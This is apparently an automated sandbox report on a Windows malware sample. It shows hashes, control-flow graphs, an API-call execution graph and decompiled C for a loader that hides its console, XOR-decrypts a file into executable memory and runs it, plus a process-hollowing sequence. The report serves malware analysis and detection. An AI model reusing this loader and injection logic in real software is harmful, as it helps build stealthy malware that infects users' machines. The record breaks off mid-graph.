                                                            control_flow_graph 246 4207da-420820 call 42005f call 420073 GetSystemInfo 252 420822-420825 246->252 253 420829 246->253 254 42082b-42082e 252->254 253->254
                                                            APIs
                                                            • GetSystemInfo.KERNELBASE(?), ref: 004207F7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245387328.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_420000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem
                                                            • String ID:
                                                            • API String ID: 31276548-0
                                                            • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                            • Instruction ID: 2d904a6e80aa5fef5fe1180fc8d06bc727ef1bd0b01c4b10035705b1c24dd688
                                                            • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                            • Instruction Fuzzy Hash: 31F0A771F1411CAFDB08F6B8A8456BFB7FCDB08300F50456EE606E2242D938854142A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401130 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 74filememoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            C-Code - Quality: 77%
                                                            			E00401130(intOrPtr _a8) {
				signed int _v8;
				struct _IO_FILE* _v12;
				int _v16;
				void* _v20;
				char* _v24;
				struct HWND__* _t32;
				struct _IO_FILE* _t36;
				long _t39;
				void* _t42;

				_v8 = 0;
				_v16 = 0;
				_v24 = "248058040134";
				__imp__GetConsoleWindow(); // executed
				ShowWindow(_t32, 0); // executed
				_t36 = fopen( *(_a8 + (4 << 0)), 0x4030a4); // executed
				_v12 = _t36;
				fseek(_v12, 0, 2); // executed
				_t39 = ftell(_v12); // executed
				_v16 = _t39;
				fseek(_v12, 0, 0); // executed
				_t42 = VirtualAlloc(0, _v16, 0x3000, 0x40); // executed
				_v20 = _t42;
				fread(_v20, _v16, 1, _v12); // executed
				while(_v8 < _v16) {
					asm("cdq");
					 *((char*)(_v20 + _v8)) =  *(_v20 + _v8) & 0x000000ff ^ _v24[_v8 % 0xc] & 0x000000ff;
					_v8 = _v8 + 1;
				}
				goto __eax;
			}












                                                            0x00401136
                                                            0x0040113d
                                                            0x00401144
                                                            0x0040114d
                                                            0x00401154
                                                            0x0040116e
                                                            0x00401177
                                                            0x00401182
                                                            0x0040118f
                                                            0x00401198
                                                            0x004011a3
                                                            0x004011b9
                                                            0x004011bf
                                                            0x004011d0
                                                            0x004011d9
                                                            0x004011e4
                                                            0x00401204
                                                            0x0040120c
                                                            0x0040120c
                                                            0x00401214

                                                            APIs
                                                            • GetConsoleWindow.KERNELBASE(00000000), ref: 0040114D
                                                            • ShowWindow.USER32(00000000), ref: 00401154
                                                            • fopen.MSVCRT ref: 0040116E
                                                            • fseek.MSVCRT ref: 00401182
                                                            • ftell.MSVCRT ref: 0040118F
                                                            • fseek.MSVCRT ref: 004011A3
                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040,?,?,?,?,?,?,?,?,?,?,?), ref: 004011B9
                                                            • fread.MSVCRT ref: 004011D0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245356618.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.245350817.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.245369666.0000000000402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.245374337.0000000000403000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: Windowfseek$AllocConsoleShowVirtualfopenfreadftell
                                                            • String ID: 248058040134
                                                            • API String ID: 1512859468-1212554544
                                                            • Opcode ID: b712b21930f84f64824a409d480e028470c4028a14380c671e8f8a1558e94d43
                                                            • Instruction ID: 9f35d128f0fc62b34356d4069eab162610d2d2ef3205a5c4f266a8a3b99c8786
                                                            • Opcode Fuzzy Hash: b712b21930f84f64824a409d480e028470c4028a14380c671e8f8a1558e94d43
                                                            • Instruction Fuzzy Hash: 4F315EB0E00208EFDB04DF94DE59BAEBB75EF44305F1084A9E601BB2D1D7B56A10CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401000 Relevance: 15.1, APIs: 10, Instructions: 74COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            C-Code - Quality: 68%
                                                            			_entry_(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				int _v32;
				char** _v36;
				int _v40;
				void _v44;
				char** _v48;
				intOrPtr _v52;
				intOrPtr* _t18;
				intOrPtr* _t19;
				void _t24;
				int _t30;
				intOrPtr* _t31;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t46;

				_push(0xffffffff);
				_push(0x402180);
				_push(0x401226);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t46;
				_v28 = _t46 - 0x20;
				_v8 = _v8 & 0x00000000;
				__set_app_type(1);
				 *0x4030b8 =  *0x4030b8 | 0xffffffff;
				 *0x4030bc =  *0x4030bc | 0xffffffff;
				_t18 = __p__fmode();
				_t34 =  *0x4030b4; // 0x0
				 *_t18 = _t34;
				_t19 = __p__commode();
				_t35 =  *0x4030b0; // 0x0
				 *_t19 = _t35;
				 *0x4030c0 = _adjust_fdiv;
				E00401125( *_adjust_fdiv);
				if( *0x403010 == 0) {
					__setusermatherr(E00401122);
				}
				E00401110();
				_push(0x40300c);
				_push(0x403008);
				L00401220();
				_t24 =  *0x4030ac; // 0x0
				_v44 = _t24;
				__getmainargs( &_v32,  &_v48,  &_v36,  *0x4030a8,  &_v44);
				_push(0x403004);
				_push(0x403000);
				L00401220();
				_t30 = __p___initenv();
				 *_t30 = _v36;
				_push(_v36);
				E00401130(_v32, _v48); // executed
				_v40 = _t30;
				exit(_t30);
				_t31 = _v24;
				_t38 =  *((intOrPtr*)( *_t31));
				_v52 = _t38;
				_push(_t31);
				_push(_t38);
				L0040121A();
				return _t31;
			}





















                                                            0x00401003
                                                            0x00401005
                                                            0x0040100a
                                                            0x00401015
                                                            0x00401016
                                                            0x00401023
                                                            0x00401026
                                                            0x0040102c
                                                            0x00401033
                                                            0x0040103a
                                                            0x00401041
                                                            0x00401047
                                                            0x0040104d
                                                            0x0040104f
                                                            0x00401055
                                                            0x0040105b
                                                            0x00401064
                                                            0x00401069
                                                            0x00401075
                                                            0x0040107c
                                                            0x00401082
                                                            0x00401083
                                                            0x00401088
                                                            0x0040108d
                                                            0x00401092
                                                            0x00401097
                                                            0x0040109c
                                                            0x004010b5
                                                            0x004010bb
                                                            0x004010c0
                                                            0x004010c5
                                                            0x004010ca
                                                            0x004010d3
                                                            0x004010d5
                                                            0x004010de
                                                            0x004010e6
                                                            0x004010ea
                                                            0x004010f0
                                                            0x004010f5
                                                            0x004010f7
                                                            0x004010fa
                                                            0x004010fb
                                                            0x004010fc
                                                            0x00401103

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245356618.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.245350817.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.245369666.0000000000402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.245374337.0000000000403000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: _initterm$FilterXcpt__getmainargs__p___initenv__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                            • String ID:
                                                            • API String ID: 167530163-0
                                                            • Opcode ID: e26d2950e1ab582dcb997a4696af2302c69bd8842dc8ebf13075a810d705adf5
                                                            • Instruction ID: 6fa903c3a2b81d993dd9e19802ee735590fcea08e0facb43c13bd3eba05b0306
                                                            • Opcode Fuzzy Hash: e26d2950e1ab582dcb997a4696af2302c69bd8842dc8ebf13075a810d705adf5
                                                            • Instruction Fuzzy Hash: 11314B71901304EFDB049FA0EE49A9ABF78FB0C311F10422AF611B62F0D7789604CB28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00420EEA Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,00421780,7FAB7E30), ref: 00420FB0
                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00421780,7FAB7E30,0042143E,00000000,00000040), ref: 00420FDA
                                                            • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,00421780,7FAB7E30,0042143E,00000000), ref: 00420FF1
                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00421780,7FAB7E30,0042143E,00000000,00000040), ref: 00421013
                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,00421780,7FAB7E30,0042143E,00000000,00000040,?,00000000,0000000E), ref: 00421085
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00421780,7FAB7E30,0042143E,00000000,00000040,?), ref: 00421090
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00421780,7FAB7E30,0042143E,00000000,00000040,?), ref: 004210DB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245387328.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_420000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                            • String ID:
                                                            • API String ID: 656311269-0
                                                            • Opcode ID: 375b06487fa1cb6ff4b586dbb5156a5d227deb74a33a98d81c0347bec2b94e3a
                                                            • Instruction ID: 78e9d25ae6b403fb5284b6e17afff1dc69436dbcd964f7166e5b32184b55a2a0
                                                            • Opcode Fuzzy Hash: 375b06487fa1cb6ff4b586dbb5156a5d227deb74a33a98d81c0347bec2b94e3a
                                                            • Instruction Fuzzy Hash: 3751C071F00368ABDB209FB5EC84BAEB7B8EF14710F50455AF900F7291E77899418B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0042020A Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 425COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 65 42020a-420225 call 42005f 68 420228-42022c 65->68 69 420244-420251 68->69 70 42022e-420242 68->70 71 420254-420258 69->71 70->68 72 420270-42027d 71->72 73 42025a-42026e 71->73 74 420280-420284 72->74 73->71 75 420286-42029a 74->75 76 42029c-42037a call 420073 * 8 74->76 75->74 93 420391 76->93 94 42037c-420386 76->94 95 420395-4203b1 93->95 94->93 96 420388-42038f 94->96 98 4203b3-4203b5 95->98 99 4203ba 95->99 96->95 100 420734-420737 98->100 101 4203c1-4203e9 CreateProcessW 99->101 102 4203f0-420409 GetThreadContext 101->102 103 4203eb 101->103 105 420410-42042d ReadProcessMemory 102->105 106 42040b 102->106 104 4206e8-4206ec 103->104 107 420731-420733 104->107 108 4206ee-4206f2 104->108 109 420434-42043d 105->109 110 42042f 105->110 106->104 107->100 111 4206f4-4206ff 108->111 112 420705-420709 108->112 113 420464-420483 call 421330 109->113 114 42043f-42044e 109->114 110->104 111->112 116 420711-420715 112->116 117 42070b 112->117 125 420485 113->125 126 42048a-4204ab call 42144a 113->126 114->113 118 420450-420456 call 42129b 114->118 121 420717 116->121 122 42071d-420721 116->122 117->116 124 42045b-42045d 118->124 121->122 127 420723-420728 call 42129b 122->127 128 42072d-42072f 122->128 124->113 129 42045f 124->129 125->104 133 4204f0-420510 call 42144a 126->133 134 4204ad-4204b4 126->134 127->128 128->100 129->104 140 420512 133->140 141 420517-42052c call 4200da 133->141 136 4204b6-4204e2 call 42144a 134->136 137 4204eb 134->137 144 4204e4 136->144 145 4204e9 136->145 137->104 140->104 147 420535-42053f 141->147 144->104 145->133 148 420571-420575 147->148 149 420541-42056f call 4200da 147->149 151 420655-420671 call 4210e9 148->151 152 42057b-420589 148->152 149->147 160 420673 151->160 161 420675-420696 SetThreadContext 151->161 152->151 155 42058f-42059d 152->155 155->151 158 4205a3-4205c3 155->158 159 4205c6-4205ca 158->159 159->151 162 4205d0-4205e5 159->162 160->104 163 42069a-4206a4 call 4211ea 161->163 164 420698 161->164 165 4205f7-4205fb 162->165 170 4206a6 163->170 171 4206a8-4206ac 163->171 164->104 168 420638-420650 165->168 169 4205fd-420609 165->169 168->159 172 420636 169->172 173 42060b-420634 169->173 170->104 174 4206b4-4206b8 171->174 175 4206ae 171->175 172->165 173->172 177 4206c0-4206c4 174->177 178 4206ba 174->178 175->174 179 4206c6 177->179 180 4206cc-4206d0 177->180 178->177 179->180 181 4206d2-4206d7 call 42129b 180->181 182 4206dc-4206e2 180->182 181->182 182->101 182->104
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245387328.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_420000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D
                                                            • API String ID: 0-2746444292
                                                            • Opcode ID: c00b96c37fdc3ece974be0c07b3f8187e456c98ecbc718b9829efbd4ac5e7b8d
                                                            • Instruction ID: 8c7cb0e8a9e8446edbde47abe342a722a1433fc57373a1c3f5adca4017d64e5b
                                                            • Opcode Fuzzy Hash: c00b96c37fdc3ece974be0c07b3f8187e456c98ecbc718b9829efbd4ac5e7b8d
                                                            • Instruction Fuzzy Hash: 2102F670E00228EFDB10DF94D985BADBBF5BF04305F60405AE515BA2A2D778AE91DF18
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00420838 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 004207DA: GetSystemInfo.KERNELBASE(?), ref: 004207F7
                                                            • VirtualAllocExNuma.KERNELBASE(00000000), ref: 0042089D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245387328.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_420000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: AllocInfoNumaSystemVirtual
                                                            • String ID:
                                                            • API String ID: 449148690-0
                                                            • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                                            • Instruction ID: 2e96a6c87a745345a0762a4bb07c0bf917112bcd96ab05a4ab5a4eb9ad3c60ec
                                                            • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                                            • Instruction Fuzzy Hash: C5F0F470F44328BEFB107BF2780B76E7AE8EF00349F90459B7540A6193DA7C56008AAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0042073A Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 312 42073a-420781 call 42005f call 420073 * 2 VirtualAlloc 319 420783-420786 312->319 320 420788-420790 312->320 319->320 321 420792-42079f 320->321 322 4207d5-4207d9 320->322 323 4207a2-4207a6 321->323 324 4207a8-4207bc 323->324 325 4207be-4207cf 323->325 324->323 325->322
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 00420777
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245387328.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_420000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                                            • Instruction ID: 9db519389cc65151f19a590367f790fb1215a4a2255675ceaced1f6763432eb8
                                                            • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                                            • Instruction Fuzzy Hash: 66110A70E40218AFEB00EBA9DC89BAEBBF4EB04304F604496E515B7292D2755A459F94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 0042017B Relevance: .1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245387328.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_420000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                            • Instruction ID: c26ba63cc96c7d13234ea10027f4e5a7d4ad35b9f3330ce5eb1b64ba369f26a1
                                                            • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                            • Instruction Fuzzy Hash: F511A036600129AFD710EF69D8809AAB7E9EF147A47848016FC54CB312E339ED91C768
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0042013E Relevance: .0, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245387328.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_420000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                            • Instruction ID: e189dcd0b60dc4b9daf4effcfc53bff17875f130314e7e6638e336acc69a3bc0
                                                            • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                            • Instruction Fuzzy Hash: 24E065353A4148AFDB00CBA8D881D25B3E8EB08320B540291F825C73A2E638EE00DA54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00420109 Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245387328.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_420000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                            • Instruction ID: c81d7800e6cecfb8cbcafcd462a7ce755306d641c35c64a14127f96065d95dfc
                                                            • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                            • Instruction Fuzzy Hash: A2E04F323106249BC7619B5AE840DA7F7E8EB887B0B894466ED8997622C335FC21D794
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0042005F Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245387328.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_420000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                            • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                            • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                            • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:3.9%
                                                            Dynamic/Decrypted Code Coverage:2.5%
                                                            Signature Coverage:4.6%
                                                            Total number of Nodes:651
                                                            Total number of Limit Nodes:79
                                                            execution_graph 33935 420083 33938 41e753 33935->33938 33943 41f193 33938->33943 33940 41e76f 33947 a39a00 LdrInitializeThunk 33940->33947 33941 41e78a 33944 41f1a2 33943->33944 33946 41f218 33943->33946 33944->33946 33948 419553 33944->33948 33946->33940 33947->33941 33949 41956d 33948->33949 33950 419561 33948->33950 33949->33946 33950->33949 33953 4199d3 LdrLoadDll 33950->33953 33952 4196bf 33952->33946 33953->33952 33954 401702 33955 401746 33954->33955 33959 423273 33955->33959 33962 423267 33955->33962 33956 4017ec 33960 42327e 33959->33960 33965 41fbc3 33959->33965 33960->33956 33963 41fbc3 22 API calls 33962->33963 33964 42327e 33963->33964 33964->33956 33966 41fbe9 33965->33966 33979 40bed3 33966->33979 33968 41fbf5 33969 41fc59 33968->33969 33987 4100d3 33968->33987 33969->33960 33971 41fc14 33972 41fc27 33971->33972 33999 410093 33971->33999 33975 41fc3c 33972->33975 34018 41e883 33972->34018 34014 403553 33975->34014 33977 41fc4b 33978 41e883 2 API calls 33977->33978 33978->33969 34022 40be23 33979->34022 33981 40bee0 33982 40bee7 33981->33982 34034 40bdc3 33981->34034 33982->33968 33988 4100df 33987->33988 34431 40d413 33988->34431 33990 410111 34435 40ffa3 33990->34435 33993 410155 33993->33971 33994 410144 33994->33993 33998 41e663 2 API calls 33994->33998 33995 41012c 33996 410137 33995->33996 33997 41e663 2 API calls 33995->33997 33996->33971 33997->33996 33998->33993 34000 4100b2 33999->34000 34001 419553 LdrLoadDll 33999->34001 34002 4100bb GetUserGeoID 34000->34002 34003 4100b9 34000->34003 34001->34000 34002->33972 34003->33972 34004 40d413 LdrLoadDll 34003->34004 34005 410111 34004->34005 34006 40ffa3 3 API calls 34005->34006 34007 410122 34006->34007 34008 410144 34007->34008 34009 41012c 34007->34009 34010 410155 34008->34010 34013 41e663 2 API calls 34008->34013 34011 410137 34009->34011 34012 41e663 2 API calls 34009->34012 34010->33972 34011->33972 34012->34011 34013->34010 34015 4035aa 34014->34015 34017 4035b7 34015->34017 34454 40dda3 34015->34454 34017->33977 34019 41f193 LdrLoadDll 34018->34019 34020 41e8a2 ExitProcess 34019->34020 34053 41ce03 34022->34053 34026 40be49 34026->33981 34027 40be3f 34027->34026 34060 41f513 34027->34060 34029 40be86 34029->34026 34071 40bc63 34029->34071 34031 40bea6 34077 40b6c3 LdrLoadDll 34031->34077 34033 40beb8 34033->33981 34405 41f803 34034->34405 34037 41f803 LdrLoadDll 34038 40bdf4 34037->34038 34039 41f803 LdrLoadDll 34038->34039 34040 40be0d 34039->34040 34041 40fe93 34040->34041 34042 40feac 34041->34042 34414 40d293 34042->34414 34044 40febf 34418 41e3b3 34044->34418 34048 40fee5 34052 40ff10 34048->34052 34424 41e433 34048->34424 34049 41e663 2 API calls 34051 40bef8 34049->34051 34051->33968 34052->34049 34054 41ce12 34053->34054 34055 419553 LdrLoadDll 34054->34055 34056 40be36 34055->34056 34057 41ccc3 34056->34057 34078 41e7d3 34057->34078 34061 41f52c 34060->34061 34081 419143 34061->34081 34063 41f544 34064 41f54d 34063->34064 34120 41f353 34063->34120 34064->34029 34066 41f561 34066->34064 34137 41e0d3 34066->34137 34068 41f595 34142 4200c3 34068->34142 34072 40bc7d 34071->34072 34383 409453 34071->34383 34074 40bc84 34072->34074 34396 409713 34072->34396 34074->34031 34077->34033 34079 41f193 LdrLoadDll 34078->34079 34080 41ccd8 34079->34080 34080->34027 34082 419486 34081->34082 34083 419157 34081->34083 34082->34063 34083->34082 34145 41de23 34083->34145 34086 419288 34148 41e533 34086->34148 34087 41926b 34205 41e633 LdrLoadDll 34087->34205 34090 419275 34090->34063 34091 4192af 34092 4200c3 2 API calls 34091->34092 34093 4192bb 34092->34093 34093->34090 34094 41944a 34093->34094 34096 419460 34093->34096 34100 419353 34093->34100 34095 41e663 2 API calls 34094->34095 34097 419451 34095->34097 34214 418e73 LdrLoadDll NtReadFile NtClose 34096->34214 34097->34063 34099 419473 34099->34063 34101 4193ba 34100->34101 34103 419362 34100->34103 34101->34094 34102 4193cd 34101->34102 34207 41e4b3 34102->34207 34105 419367 34103->34105 34106 41937b 34103->34106 34206 418d33 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34105->34206 34107 419380 34106->34107 34108 419398 34106->34108 34151 418dd3 34107->34151 34108->34097 34163 418af3 34108->34163 34113 419371 34113->34063 34114 41938e 34114->34063 34116 41942d 34211 41e663 34116->34211 34117 4193b0 34117->34063 34119 419439 34119->34063 34122 41f36e 34120->34122 34121 41f380 34121->34066 34122->34121 34232 420043 34122->34232 34124 41f3a0 34235 418753 34124->34235 34126 41f3c3 34126->34121 34127 418753 3 API calls 34126->34127 34129 41f3e5 34127->34129 34129->34121 34260 419aa3 34129->34260 34130 41f46d 34131 41f47d 34130->34131 34355 41f123 LdrLoadDll 34130->34355 34271 41ef93 34131->34271 34134 41f4ab 34350 41e093 34134->34350 34136 41f4d5 34136->34066 34138 41f193 LdrLoadDll 34137->34138 34139 41e0ef 34138->34139 34377 a3967a 34139->34377 34140 41e10a 34140->34068 34380 41e843 34142->34380 34144 41f5bf 34144->34029 34146 41f193 LdrLoadDll 34145->34146 34147 41923c 34146->34147 34147->34086 34147->34087 34147->34090 34149 41e54f NtCreateFile 34148->34149 34150 41f193 LdrLoadDll 34148->34150 34149->34091 34150->34149 34152 418def 34151->34152 34153 41e4b3 LdrLoadDll 34152->34153 34154 418e10 34153->34154 34155 418e17 34154->34155 34156 418e2b 34154->34156 34158 41e663 2 API calls 34155->34158 34157 41e663 2 API calls 34156->34157 34159 418e34 34157->34159 34160 418e20 34158->34160 34215 4201e3 LdrLoadDll RtlAllocateHeap 34159->34215 34160->34114 34162 418e3f 34162->34114 34164 418b71 34163->34164 34165 418b3e 34163->34165 34167 418cbc 34164->34167 34171 418b8d 34164->34171 34166 41e4b3 LdrLoadDll 34165->34166 34168 418b59 34166->34168 34169 41e4b3 LdrLoadDll 34167->34169 34170 41e663 2 API calls 34168->34170 34175 418cd7 34169->34175 34172 418b62 34170->34172 34173 41e4b3 LdrLoadDll 34171->34173 34172->34117 34174 418ba8 34173->34174 34177 418bc4 34174->34177 34178 418baf 34174->34178 34228 41e4f3 LdrLoadDll 34175->34228 34179 418bc9 34177->34179 34180 418bdf 34177->34180 34182 41e663 2 API calls 34178->34182 34183 41e663 2 API calls 34179->34183 34191 418be4 34180->34191 34216 4201a3 34180->34216 34181 418d11 34184 41e663 2 API calls 34181->34184 34185 418bb8 34182->34185 34186 418bd2 34183->34186 34188 418d1c 34184->34188 34185->34117 34186->34117 34187 418bf6 34187->34117 34188->34117 34191->34187 34219 41e5e3 34191->34219 34192 418c61 34195 418c68 34192->34195 34196 418c7d 34192->34196 34193 418c4a 34193->34192 34227 41e473 LdrLoadDll 34193->34227 34197 41e663 2 API calls 34195->34197 34198 41e663 2 API calls 34196->34198 34197->34187 34199 418c86 34198->34199 34200 418cb2 34199->34200 34222 41fec3 34199->34222 34200->34117 34202 418c9d 34203 4200c3 2 API calls 34202->34203 34204 418ca6 34203->34204 34204->34117 34205->34090 34206->34113 34208 41f193 LdrLoadDll 34207->34208 34209 419415 34207->34209 34208->34209 34210 41e4f3 LdrLoadDll 34209->34210 34210->34116 34212 41f193 LdrLoadDll 34211->34212 34213 41e67f NtClose 34212->34213 34213->34119 34214->34099 34215->34162 34218 4201bb 34216->34218 34229 41e803 34216->34229 34218->34191 34220 41e5ff NtReadFile 34219->34220 34221 41f193 LdrLoadDll 34219->34221 34220->34193 34221->34220 34223 41fed0 34222->34223 34224 41fee7 34222->34224 34223->34224 34225 4201a3 2 API calls 34223->34225 34224->34202 34226 41fefe 34225->34226 34226->34202 34227->34192 34228->34181 34230 41f193 LdrLoadDll 34229->34230 34231 41e81f RtlAllocateHeap 34230->34231 34231->34218 34356 41e713 34232->34356 34234 420070 34234->34124 34236 418764 34235->34236 34237 41876c 34235->34237 34236->34126 34259 418a3f 34237->34259 34359 421233 34237->34359 34239 4187c0 34240 421233 2 API calls 34239->34240 34243 4187cb 34240->34243 34241 418819 34244 421233 2 API calls 34241->34244 34243->34241 34364 4212d3 LdrLoadDll RtlAllocateHeap RtlFreeHeap 34243->34364 34246 41882d 34244->34246 34245 421233 